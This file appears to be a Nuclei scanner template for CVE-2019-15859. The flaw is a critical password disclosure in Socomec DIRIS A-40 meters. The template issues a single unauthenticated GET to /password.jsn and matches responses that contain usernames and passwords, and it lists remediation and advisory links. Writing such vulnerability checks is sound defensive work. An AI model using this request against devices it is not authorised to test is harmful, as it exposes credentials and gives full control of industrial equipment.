54 lines
1.8 KiB
YAML
54 lines
1.8 KiB
YAML
id: CVE-2019-15859
|
|
|
|
info:
|
|
name: Socomec DIRIS A-40 Devices Password Disclosure
|
|
author: geeknik
|
|
severity: critical
|
|
description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.
|
|
remediation: |
|
|
Update the firmware of the Socomec DIRIS A-40 devices to the latest version to mitigate the vulnerability.
|
|
reference:
|
|
- https://seclists.org/fulldisclosure/2019/Oct/10
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-15859
|
|
- http://packetstormsecurity.com/files/154764/Socomec-DIRIS-A-40-Password-Disclosure.html
|
|
- https://www.socomec.com/single-circuit-multifunction-meters_en.html
|
|
- http://seclists.org/fulldisclosure/2019/Oct/10
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2019-15859
|
|
cwe-id: CWE-200
|
|
epss-score: 0.12379
|
|
epss-percentile: 0.94814
|
|
cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: socomec
|
|
product: diris_a-40_firmware
|
|
tags: seclists,packetstorm,cve,cve2019,disclosure,socomec,diris,iot
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/password.jsn"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/json"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "username"
|
|
- "password"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a00463044022073357d61bf898f59685e14386f422e26350dc57cb5ef31e2e66a710d80a9707c022024655534d47349c4abcebb31849f8bc7f294a73a2db48c539bd6a3c8b5c108e7:922c64590222798bb761d5b6d8e72950
|